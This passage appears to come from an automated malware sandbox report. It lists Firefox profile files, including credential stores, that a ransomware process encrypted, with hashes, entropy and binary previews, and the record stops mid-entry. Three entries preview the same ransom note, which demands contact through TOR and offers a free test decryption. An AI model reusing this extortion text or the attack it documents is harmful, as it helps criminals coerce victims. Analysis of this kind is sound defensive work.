                  SHA-512:84EFBDAA6F635192F377A6DF483B7171339F9C78E3426A5E663B8E6843707773F948BC023D7E8526DAD9B306F94ADEED497FBDD26BCC6E3A05688501B9D7BA6C
                  Malicious:false
                  Reputation:low
                  Preview: 9S....z.;...*D......R.}5.#..UNv.b........-.p....P.*......o.....W...........G..|.zu....*...V{."....|..S.+.....f...SV7=u.._^..81.....D.m....I..S..=..*..1\.f.......%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................q.d...h...~.A..$.SM.1y..L....X.4...E.....64..........H.+
                  /home/user/.mozilla/firefox/u5o5kk16.default/datareporting/state.json
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):283
                  Entropy (8bit):5.487520654148638
                  Encrypted:false
                  SSDEEP:6:pC4jQceqv/7V1zmhOO/EUyp6Xc1NZROfLUl4:pNH7r2DcUBWhm
                  MD5:EE8D0872CDF2F6316B889AB56D3D92B5
                  SHA1:273F89DFA37150804E3D5E3B42DEEE3CCCEB6895
                  SHA-256:0A94420877EEB503F63EA74F2505810D0241BC6F2BA842B7E554A93DC4EBA483
                  SHA-512:EE8138D91709DE88F957EAC03AB82C8A5B00C7C80242738C4BBED72B5D5C5E1DBAEA227D45E63C71835409FEC42F9C50BADD362BD3AC47B5A69ABE5478EFB8B4
                  Malicious:false
                  Reputation:low
                  Preview: .>{....,....:....u...sh.."+..m4..asgyvY...y.w.{.*1.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp...........................................................................................u0...............f........m.~.C..o.Q.\.l.............
                  /home/user/.mozilla/firefox/u5o5kk16.default/extensions.json
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):12329
                  Entropy (8bit):7.9800978292941185
                  Encrypted:false
                  SSDEEP:192:PGAxsUxJ93ssXn8v3fUZ0wN9lnvbt81PcjFlDdqqafNzIDwm173d/:v3xJxsen8vv8N9lgYDdNgNMDX7t/
                  MD5:16D7AB6FE9B3DD032102B207F5E51E34
                  SHA1:3BE16F6C8EB779857506068937F04D1F17CCDE95
                  SHA-256:7C0452317B75A1EE6803760E5E2A1BF59C960281355D1C125CA61DFD33B3A9D3
                  SHA-512:ACF5E8C1738DE8D82CA3D92B291E0E63875461DD94A021B11E192A0DE1337D5D177176D4058AFFF67B06F4113333C75225B8D3572C8F7E3ECE35540B6CD5E0A2
                  Malicious:false
                  Reputation:low
                  Preview: ....C.d=....>.C..v....ou\....F..#....-.....}.v......u."Kn'.........-..'.....\.|....B9..IK.X...}L<.Sv.t..>........x)[...\.5.y0H.?..=.z.tL...'.3:..4..3.....).\...P...C%..i~,.a&x.'.(S......{......<.-.1......$..t7!...R....Z.........m.......1....w.?e.......D..55...6.Th)Q2..\r&*......&D..!.....f.....u.i;.u......}|....wJ.$.)u.K.9..>R.@...r<. ...\.w..:4M...`.=.......@..z8p.H......i.!....,.A.....v...xN.Q...[\...K1..1.(]}.....h9....<..`..R..8.7....>.f.2}7...u,.)4.....$..6bH.....4...6...9.....O....h...@n.[..B..|j\.+.y.p..w.M3.......&...B{.^.....b..;k..uO. U JQ.v*eFV[..3..C@u.h..;..UKH..'...3L....=Ib2..*2P..>.b...D........D.5..7^U..Hsc...g.......y..W..d.t.T...l..\.-.......w.rP.......VT......(L$x|..6e.QJ...^....qb......<..AC..X..Y.!m.k.t..jVHe.n:,.m..W....*..T.,X.h...S.."5...Vb...YCA...l...W6..|.X.'..b.I.PS.K.r.....eg`C..Y.a.i..u%.x@.t,M.@D0..hdA....i.4.a...Vx..!..a.....|.C.....v.....YIPX....^...LP^@....^>.....t...D~IG8..`:.fi`;..~P..I.Y............[....%...$..t...H.B9..!.E..hc...oT.m..x...........
                  /home/user/.mozilla/firefox/u5o5kk16.default/favicons.sqlite
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):5243112
                  Entropy (8bit):7.999968663663776
                  Encrypted:true
                  SSDEEP:98304:P6oPiPK7osNxlyWnm61yP8ntuVvjNvgDWuWj+1O86VsvxAp6Y+tFZKGRufiisaQC:C8iqosPlE61GmkvjNaKCvxAi+iisa60
                  MD5:7088721ED3144C9713DC4FA97B3A5D9B
                  SHA1:20F1424B07FF5247812CB82FC0FF9C40802E49CC
                  SHA-256:E0FCC81DCAA394BE80D2C5EE0B18A23F1DA99E2206C665533F11D417076A97EE
                  SHA-512:B94AF50DF0DDB334D3C75403FE291FF4870309B06ED0339361D83F23BAAFE8C175D489BBF27F544B0F27F26824926A4AAACAD18863226CC4C034BFF515788220
                  Malicious:false
                  Reputation:low
                  Preview: .>[..d =S9G...bD..h.R..~~.D..[..?u(...9w......l...<......V..Q.....]....(...;.....).-.[.....xy.<..Uy...1.O..8.Z..u.....|d.J.i,....,5{.A\..._:.-.H....'.m.gt.....7[.......Z.......C"B.....(te..?..}.A....aG-3YUG...;../...>"..d.....g...:<^C..%?....=..FD.f./.]..]m2*......#..,.........8.H...M.T.Z.H`Y...v.!q+.Ne..i?X...$..=.0g.3...b1G.".77.tD.....f...7..<F......A...L.8..v.._......H.]M......`w..5gf..0.$.#..Q L..T..w0.m_t.N..?z....l{.....<b.]..*).G.1'O......-!bh.:9Q.i..s..v.L......7.......W....o.I......qqmTD..V...._4.......[{T...f...\1...d..L..`.;..KE.u.4\:.6.......@..Z..7._.....V..^I)C.......L......24..*5..X.Y...'X.7P.FHp.......{4aG.......A\p.c...4..........K....3AH.4.=SHG{Y%[.K-y..Q.lN1..Y."!B.z...n.m..d......b..A.....$V...............2...`I..0.B.%6:.p..o.e.........}._-....8.R.....W.R..A<...?.hm"..q....x6.=.,....(Ub.d...$....xn<F.&u3F....G....3.Z.........#.9.....Q..A.)..}.._ZE(.:;.u*....!...y..St.f...v..O.;.l."..ZZ.}..Fi..W....W./,.8....W....\U....<...N.(.Zg.\..y..[..}...8....lhd.%A......1.....
                  /home/user/.mozilla/firefox/u5o5kk16.default/gmp/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/handlers.json
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):915
                  Entropy (8bit):7.408237778398453
                  Encrypted:false
                  SSDEEP:24:UsKmndHoVCCe1OlMunQrSpHPzW7Eo2DfN4jH8L:UfSHMzlrQrKvzWWDijcL
                  MD5:361D7FEDDC109C3156193A6A7C6A8493
                  SHA1:3E68885781764CC71DDB95AE8F08D8CD2ADC7401
                  SHA-256:429F16BAB7D1B2A252E7C7B5550D3F14E21383C80AAD9B022D9757B26695AFEF
                  SHA-512:D41CFCE7D328A9B8063EC4755BC4D8BC69DD312AB70DB9A5356415251F51F8D2A5763CDB545B5A599A45F1535FC8D5A2414DA2BAFD921385D264195F350D0B27
                  Malicious:false
                  Reputation:low
                  Preview: q(.T.m#a......g.).M..GJ.%...H."#J:.%=..[..-u<..1hF......C%...v.i.-<WB...R..~m..%..SNoYf.......t..hEn.B3.y4|xg......,]Vef....8r.I.....D..'.....~(.iAn'.l<.I....O......~".......W.0l.....4.]6E)....j..?........1i.E..-=..0......AD.77n...>H?....w.Y..,...j:9....-.O......1.Kp.~.u.....E...-...#.i....H......Wn...F..+v..L.{.JN...#b........U..p.+a..".......%#Fn.p.....(...L......\tb.3.^.L...}T(...c..0....N.(..........$..F......Vo.K..S...=.U..h..KAr..K.C.+e....$wV.3sepX.2...O......v.."..j....v[.t..<.;...(LV.(.@+7_f...................c..Bc.F.......m.q..)..D_.Kl.....j..m...H!O..e.......nU....E..$3.e..R.By.$......6.1#..q....+.uW.w..........`..?......}.....Gs....#..Z...(.5i.....s...71.U....*.]%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................]nb.1..\es.o`.......(..,1..h....soI..s...D............
                  /home/user/.mozilla/firefox/u5o5kk16.default/key3.db
                  Process:./wQN5w2558L
                  File Type:DOS executable (COM)
                  Category:dropped
                  Size (bytes):16616
                  Entropy (8bit):7.985591764926601
                  Encrypted:false
                  SSDEEP:384:uwB3yOiU8MSfYsqKX9IK7tSok4CNeDd8Mme:9lXh4jqKX977BvC2d3me
                  MD5:64D8D908F38BB0D2BF7101AE547D64DA
                  SHA1:EE5EBE8DADFE05B3BC54CE34A9D78F6C706C3BF8
                  SHA-256:5E80CD4856BCA03A601E52AB50C212EB5E1EF9B85C17A1AE251FE2C77EA91F24
                  SHA-512:D440B1309C27BA1AC71375948C1BA62363BC00EBDDE98069A6C7E70B003E86E741382B502A7F93C330825E2977DB5656E1B3689F7FECBB29E32BB8A1B72BAEA2
                  Malicious:false
                  Reputation:low
                  Preview: ..&.....sJ9....q..D./.{1..i|:x.fe........?^.S..t.%.7@Q...<W..=..........FT.......("..KL"...V-B...\.).).^.D.$.U../..[.#..08....\...oH.#....f...a$.fS:..,.\...=x.1.A.].X.:Otg..k...e.L..|Rn...@...Mzp.0_.V.T~......=..Kf"..~.I.+.:....;......u....w.{.. ......i.........7-t..`"...-}....[`^Y..B4.3P.......w.'.&.l..T.{.M...S...g..;........g..L..aF..........o..V......kvD![[....,................i[.:....#B$.0h...;$/G........E..qy...K....-...7q.,;...5...g...i4.JOR....=...u ...]_.1......6+.m...XtWV..<.;.....*Q..].).........W+#l...C.......a...t..5\:{$A%..#l\d..,..\.q...J....4..&...GH.....%...(TAx@.....'=..).].E...^..........JZ2./+>..08.1.v.M..!+...txU7...[<e..D..(..;-.l.l...)....H...;...Q]..Y.ns....7.........)X..c..P......y.=........,..^..o.?..RI... .......SB[...[0.w....7.f.....Gm.............$.\3U}....].4.n.....xr.4.m....Z.Z...M.....?.#z9.5A...\m......KFW.f,....?..ce.^..*vI..M....).LJ.p..>Y.@.M/...!.(.@..Ts......M.'.~...$.P\......w...ki..^Ql\yt)..iR.%.`.Hc.#.R..9.......B..7..`..s..M......"FD.s....&...;
                  /home/user/.mozilla/firefox/u5o5kk16.default/key4.db
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):295144
                  Entropy (8bit):7.999428722746024
                  Encrypted:true
                  SSDEEP:6144:tpjAVmIBKVHRbyptA/olY6FwTMfB1ioNdvfc+G7oUp:tpjkz0Rypt8YY6FSMZo6c+TC
                  MD5:D48A6BA2173A834FD6461814CCAA81B0
                  SHA1:7F91F0FD1EFC22578E9239A30ABC979D0B3CA1D2
                  SHA-256:83A4F2D494FF6D81EEE24B06AA89FAECB0303EAFE79BAB2F0E1DD7616D967DBF
                  SHA-512:3BED1ADCAB2B227F112276C93FD1B1926FAFB9B68614B7AA4E12F8FE67891EC7D24AB2DC61CF442E888FFFEC7D0553EED89F17888FE5A12B448834C129578BDB
                  Malicious:false
                  Reputation:low
                  Preview: ..w......9.W.../.I.....<N..Q.q;2a.*&..}..........Y....G......./.....X.....+...D2.P...xX...g.`....^.r...4..oZ9....t{gF.~;.o.. .<.K.8M.y....Q.........P.r...%8T.j>..>0.d.v..1.....6.s......E......"8n....F(.m........,........[..[ P.'.a.........9.~)|S......rt..V.,w..S{.BC.z..'....,...m.p........F.V>.}..g:[..V....(..u...........F.'@sp.*GQ.....?..[~..b.-&..*.....*...........?..]*...O=b..B".%.E....?d..y....H.@..+'..D.$..(...N..L.....C.j.L?Qp.{u.[X-.v...zja.....gp...L........;)b.Q.p.....:X..0...p.......k5..Sop.......J.....t...<.e=.~d.m.Y.N(.4....o..V87..pP.C-...4..t.N9^..{.g0f.W.H.D4.$H..."A.X....V.._..c..X.[.@T.........5.79.r`i?..x....M...w..:4:..jz..m3..gW.........v9....1...:8..p.j.....s,...F..<D.L........%g...q.....g..I....p1........X..?.G.....l8}....X..H^...../.!.g.4{.../.R.......*C.....b.=..9!s..O.-)..m.Y..s.i./'..}../A..#C=..,B@'E......v.....J9..:....`.Xc)..o...{c.Z.....&....0.....;O...!5...G".xl]/..,-.u.J2..3..4..9.%..."t`++-*V.L.Ci~.".hc\V.KAAD. .0.d1.1k..$....&_#.v..v~a.......SU.;...nd.
                  /home/user/.mozilla/firefox/u5o5kk16.default/minidumps/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/permissions.sqlite
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):98536
                  Entropy (8bit):7.998228588676115
                  Encrypted:true
                  SSDEEP:1536:7AHtTDnnWmcNDdD3z/qD6d01W6bVxt6fYCvHIQU9pRxGqZMd0Z59UC9MsO7FZKXU:kHtnWRjD3zk6diSfYuHURfm2fKbKk
                  MD5:9073552F2EE507A6E6259EFBF6BAEA94
                  SHA1:89FEFC70BDD630049A2EF2A354BB80FA3F2C3931
                  SHA-256:9113E102880726BC4F422CC3521045CD75393390B9BD08AE8CB7A827996CD5F2
                  SHA-512:6E643E30E6E3C68547D824364451DB08BD36ADCDF2E479F79262986EC86309F20A5CBFA1C06BE2D1C35877C07B929BAB5DC29804FC00D0D52D08661FE2190DD7
                  Malicious:false
                  Reputation:low
                  Preview: s`.om.s..{......G>p....E.._.d_a.......\....8.p..[.4...W.(......T<.c...>..>.j...@.5...=6.....b......z.W..%....5`6l^.^..k..........7..-6..{...E..'....B..#.(...........5..vv).....*#..BF.S...).r.>9..76.......H.l....+.R.b.L....9.+..(.'\......PH.....j.9..0.P<...S.J."w2.E.=..}A..8..C..*..E.6(!..1.C_..h.!....^E?..|~6B......_..w..$V |.....D...05.......(....q..uk.....M.$p@C...54x{.u.u..j\...5.n^D..PP'3....H..$-.T.*7.f.'/(u.dC..B.....mT...%...(W...1}.)....0..VIL7_..p.F../...R...R.tR.Q>h.....Z.$.O..U...k.%/q.m&..]z.LU......n....@I;cC..Hl9.\..??.........8.....x..?|uyP.D/.(../.q(zc .5R..Q........iv..V..j.MT..a.1...=....kQ...^.G:Ny..Y.3/..CR<.m.`..b..iw...............z/%k.|W~.{...G_.P...$.pTn...W...E-m....F.( .,.s|:V.Y&5.DM.......w..)..C7-.].<.........B{......*.._...........rS#"...b.K5._..2f......m."........._...P..a|.......f...b...0.I.....I...#..V.......c...2].#b...^^..c.9..yPku.F.t@..;ivN.=Q0.]L.l.j.1..................z...j.(N.>a.H.1.K.z #........V..X..][.U{b9.F.l.n$N#f.. ...._k...=. ....>....j."[.
                  /home/user/.mozilla/firefox/u5o5kk16.default/pkcs11.txt
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1109
                  Entropy (8bit):7.56274959642731
                  Encrypted:false
                  SSDEEP:24:72wqZp1I8HDcnq9Otr5bOpKkThP19zNXjtdDzw6c772Dfur:OIicqytbGHhPDhhxw6c7KDC
                  MD5:0038B5D8A0A446BE8DA27E8559C311CE
                  SHA1:B928A296E8FC598C428385165257F426F9BD27F2
                  SHA-256:2CF0E83393B2DE6019517A62A6FB1E871585CDA2EEAB096E0302F8E50309BAC1
                  SHA-512:BB758987B19328647F55D0ACE5AEF625637EBB29E77AE705594CB790B59C8E0D4683B9CCDD4C991214EE1967020395593A2C2B3BF139FD9BF20126D279EC4AA3
                  Malicious:false
                  Reputation:low
                  Preview: z@.]9e...S.....K.3Ii....Od...E..U........5....j.2..-....;.GA.x.U....k.S....g.j8..'9..,g.9.(..;B....s...T....B.d......+.L..]:..O...K........*..|.%...>...-f>.>G3...5..<...91AB......H...s.P..Ef...-67a....n|l..S.R...X.6~p..... @.],.=l...s8a.4"..Mk..F..y.....X6.*./..wfP...<v.1.K....9T.T.*.. ...u.:D.#R....O]..~.....j.!...M.z...PK..h.CCl^)p.C.j.G[.O..N.R....0......_..p..t}J...........@ix...&wS.?.w.R..SH=/.@r[Os...k...U..`{.......=.c.J....[....]2NZ...l&y..6)..R............fN.i...\.. ...l.@..%z{..mC..*..+E).l..fkZ.C.j.._.........Q.......*L..t...}...bA.5n.qg..;.R..7.9IvX..}(e}V.U.\.<.Js=..2....N......ZL.....H$........K.....Y.[...:w....H.,4....m....o?R...Y..Rt.e.<../...S.........@..........`.^.t.tT\...NA....~......w..:......j.##..Uc...v.V..PNX..~&..}n..OG....gEk...L~.E...1i.p.~P...|.hK.O..h.}.5h.Xo...\....v..Y.OK.......^R....0....1..w...f...W...z..E.s.T...<.<..J..o....3..3c.?%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp...................................
                  /home/user/.mozilla/firefox/u5o5kk16.default/places.sqlite
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):5243112
                  Entropy (8bit):7.999970556204659
                  Encrypted:true
                  SSDEEP:98304:82gfblvdnWP5Cu9QA36JMjgTprrhdBWJeDKTgRH83UCg:8NfxvdnEkuCK+uo7dBWJ8KTgRt7
                  MD5:0B1F65D62B4E4A24B3CE2D52082BC6A0
                  SHA1:30EE491A4010B8D058E5DFD685647F4EF4DCC9EA
                  SHA-256:6F5167A546D14AD707CAD1AB54A8CCE329CBAD9CE4A91C92DC6F98A771E85E46
                  SHA-512:3A2627EE9C7716E5CF92CDC9DB0BA9C10D89383DD4FE8F266017461A5E0D8CA47FF9BAA221E252691D5C0AD122259BCA403C430562BBAC976D7E7AFBEC4B8937
                  Malicious:false
                  Reputation:low
                  Preview: ...s.r.>..v.Z.Q..Q-+.[.7.....+.:..,..O....{.$.@FC.CW.=...V...?5."W..(.#>f../...H..y.uE...L.......x.....t.m..o.9l&..W..._......Wh....x....,.k^..|.L...T.C..j.j...".R....n.......%`.#.Y. /r..i...o.l........)..OGJ..j.l...M...`..........B.i.X.AT?xY.J.~....4...(.!..a.dFq.0<p".S....Z&...._{.[....x.n#;...a.oa.H/^.6..}(NOM..s...........x+YF=..'..e.......f..2Y...Q...z..y..,Q."...g..ce.LK)...K.X&...`....F....W_g~......./....*.n.U.O......[....7.e..I.n#J...8$"q.8~.............X.T-$U.s........WH.f.G,..;.'.@..Z.ga....Vs.Ai{........V..qF;..&...E..v.].+.vR.+jtN.>.<.fFb..c5\.#`...Q..n.l-g...U...(2.El4....c.R...ig.0..XA...ehX.....D...3.....&..B./..V@.*..sm......m...`.:..u.._.n.."*..!....GvH.1...d.L):0-P........I..IEp............1${"..u..6!....W......d.~.USp...u..S...6....QN....}...n7\.H.E}.j.d0..GR.#...UMe.wqZ_.`.9...h]..JiD..@QeH>.\...qT...E.!....+.d..\...iA2..b..g.......g.g.2..9...".......9...hl....p..[.;....G.X.&.9f...@.j..0....|...(..!H..w'.Z.-.C..%..o...-nY8.Z...%..F.6.?o.,.....a..J^A.M..o..z...".W5
                  /home/user/.mozilla/firefox/u5o5kk16.default/prefs.js
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):6361
                  Entropy (8bit):7.953136020212611
                  Encrypted:false
                  SSDEEP:96:BTRF1tTGnOcDw2NkSlNpSuhAKVlIYu6ofvp//xUxK8riZiVpmuUG++ViqBbmv5Rx:BTDnUG2SBuhtlIfp/ARp3UQlbS/f5j
                  MD5:CB9DED1CFD6A2EE67B656604C6ADB819
                  SHA1:4273E3CD1B3C0EE04734E431D39D017BF24E1234
                  SHA-256:2C1ABBE17D0B0C8EE6885D377C52542046711BF6422FF5281C100EC0622B46C9
                  SHA-512:79504910B123C9ED4AA3AC9BC43D28D714DC388DB0B99885DA4E56D7218C01ABA76D3C16B2438DDD4474E50D7467EB1A71EE21F3E8B3D03B25FF6634854CF680
                  Malicious:false
                  Reputation:low
                  Preview: .T.k0l..8..m<.6..O..\>.N (..%..Q......Z..e.....*~.`.[...,..Hv.(.O6c=...p..R.p.....~.g~.....c.G]\.Iml.....O......5.,.........)f".`.;+/Dg.c........B...g|.....yJ`r^owzp......L;...&..a+C..}..[...S..,.qK..U..j.C.....$#1....u...vDH....w....k....DQ.<.....y.t.Y.@.z..)g.w../..._.ja..'&..7@...9.8o.av.P.}a...0g._..........[...Av4.y,sT.....5.q.nJ1..O8.kh.|...L}>.W.........Vm....]F..-.*fv/..d...T...4....Im.{..3.a..:...o........u.oC"..'..x..yY.0=i|..>Z..]...Djm....A..G.....e..zMUQ.LS..0................ .F9..)-...)..$.5.....aA..A.j{.L...V.......;.'/\.a........)\;.3...w..e.....k.W.I..G.wnm...0..sH~3...p..~.(..C9...@...Q.fr.....v7.%.....m....r.4.L.%lu)..\i0.!@",....1f..}@.....'w.QI4'..$.....#.d.s>.^..aY.h.bo:....=MG....m.....K.<...@.^N../.0.....]....s..AE..7^..HP.Q.G.......5.4.>.|'u_..0O.....,.h..(r.L...Yt.....j...B....9..!...a.y...8...yA.u/]+...."....n...l.........c]L...b......k)..CN.f`?.k...N..e.i....^j.K.T}:1"......1.J[z:|~..].J..tVXQ..WS......m...2h-j.Sv.....=7.......SP.CJ.. .\......lN.....\.VZ.I..
                  /home/user/.mozilla/firefox/u5o5kk16.default/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/saved-telemetry-pings/583ee681-7cfa-4d12-8648-eb797a8eec37
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):24720
                  Entropy (8bit):7.990060333364499
                  Encrypted:true
                  SSDEEP:768:jU2hUNFpld8rgDicAXqEAizgSqHsxOHZR:QMUNFDCMKX0igHjH/
                  MD5:E6ADC57E0A297C559AC9BE1A00DC5299
                  SHA1:7237E8A63A918B66DD424DD571E73C1F912FB072
                  SHA-256:A374D5DE98BB686AD25C3E272373364915EDE2469764378E724F2A1E2A916FCF
                  SHA-512:1DF35E017F9343883E4A11666810B54B6FE728923498CF8EA6EDA8399BFFE9D2D66CC24431F620A716116FB4BB7BDD08D6FC062057516C066BDE6D4F06808BE9
                  Malicious:false
                  Reputation:low
                  Preview: ..R ....=..+...M.w.L........: .).F.U!Zh.....EC..=|L|Hb..y......&7s..W.......k..c2Y...!......M5..../..-h.\..",.t....L.gl..A"G.....O..{6....s}e....<P....O9R......`)....oC..t.GR,..j....m..+.a..$.u.D.P@....W..:.w@.*c.G......m.3....4-.K...I..<....".. .,.dmr*............0P.....P...*.f~....7.....N<....CS.....W..F......`.........h.".......`.]......7.....dK.<......tR8)..5.*...s.~..O....Ds..P.~..MR0]Y@Z#.......j..V..ox..Ht'WM..C(opT2.....N`n-...A.w.cqf.?L.h..H.pqx.,...ei......=..............|.a...=..SP.7..'....|.a7._......nL.....z........d...c|PH Z8.A...tU.]l.{&?.....Z!<3.T=.(5..E..wJ.#b.m.ZC......a.....Z.D...K...w.9~!w...R.....]..%......9.?.n..@......f..z....A.^$0gP.......Y.o.}k...bc.u.....-.b .....L.....R.......a]..xc*.."....p.....D.$U"..=.~K.AC.qy....".DU...#b.....4.p....YDC$...0....}..*..W`7..x..ksG...J...uT.....k$I.(tX.....:dIa..!6....:..,}.|1.T.....`Nd..nxk......+Y..9.T..X.C......H.W..v...h.V........'.Q~......X......./..sKlR4.Z.-..:dj-.3.....B64J.z.. l.....#e........>.........#..DD;&......
                  /home/user/.mozilla/firefox/u5o5kk16.default/saved-telemetry-pings/9c07e1b5-a82a-432e-9a4c-18a3a975ad85
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):24710
                  Entropy (8bit):7.990839400222497
                  Encrypted:true
                  SSDEEP:384:ctUW3fgsoYi1Pls8E4da1HehlgAAbiRIJ+trgbSytL1xCCRYlTkLvxF0ioCrnCBc:cPfgsMK4lwAAbWs+2SyFaCmNkLvf3rhN
                  MD5:218D14191AB918EB5A8D8B0933A7A858
                  SHA1:36059FAD488BB061125E9ECD6A7A78D79E9A5448
                  SHA-256:F33EA801BA45EBE862CF9BA1BC6A3E684A33E178D5949EA41BEADDC7D2CAFC40
                  SHA-512:622D0863FF9611D1ABC99AE9880A20120579ED446D9203A841817D2C61B3BFD9623C41663AC18E3E8F8EF576AEA1CFE960C0E2895F1DA348DF76DCDCAF486646
                  Malicious:false
                  Reputation:low
                  Preview: C+.......-.K.{1...@.....b.....!.F@>.......1/{...F....OC/.d.....v.....v.d`.*.4.`@........R.p...vT.`...t....g....#-w......]....)..B=....i.ss........_..>....a.:.?...dW?...........T........0.{...Ir...|...q.h~W..)t.......G...P..^..{...K.>.[.$.9...a,....M.-..V.d...).... cro..=.......K......h.S.M..9.....RB..3.^a.....I.G4.L......K.)...[.P=[`.$..j7....!.?s..S.g.c.3...>w...|.~.q.pH....2..{..6A.3..ck..G......(...sP.M....v..z.d.u.hB_....u8.gu....."...5].....S.~.s.l.x.q:.:...zm..O..8F..$Y.=Yk.....5.U..h..5..Z.Y1...I...f}..M....r..2..J=.1..@....Y..EJk].....QO.p .,.........`...+D.."k..=...%...[...C0.u[.'....pe.wL..y..1..e8.m.~a.r......5...Yk..F...l./..[.".\.....no.f....Q....x0..#aIo.8.........Q.4.d./g.......b]...."[.e....p...\1.o.v..n.........FcKF|[F....g.....~.&..S..K}...s...........l.l.D...R......... ..B..F..q.....4.K..G.....B.z.'K.k..x...c.\.<.n.....}[...V..2.(4e...F.......T<.....p$Xns.f..S...L.dJ....+..........d....igz....@..'.....=Q.t..[.....?....j..HD....vZ2v....6h6.....gJ!...]..KOW.2%..1.....6
                  /home/user/.mozilla/firefox/u5o5kk16.default/saved-telemetry-pings/e0d24830-8ed6-4f1a-b4e9-bfe84de4fc39
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):6792
